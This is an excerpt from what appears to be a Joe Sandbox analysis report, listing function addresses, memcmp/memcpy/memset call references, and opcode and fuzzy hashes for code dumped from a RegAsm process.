                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??2@$memset
                                                          • String ID:
                                                          • API String ID: 1860491036-0
                                                          • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                          • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                          • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                          • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                          Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memcmp.MSVCRT ref: 00408AF3
                                                            • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                            • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                                            • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                                                          • memcmp.MSVCRT ref: 00408B2B
                                                          • memcmp.MSVCRT ref: 00408B5C
                                                          • memcpy.MSVCRT ref: 00408B79
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcmp$memcpy
                                                          • String ID:
                                                          • API String ID: 231171946-0
                                                          • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                          • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                          • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                          • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E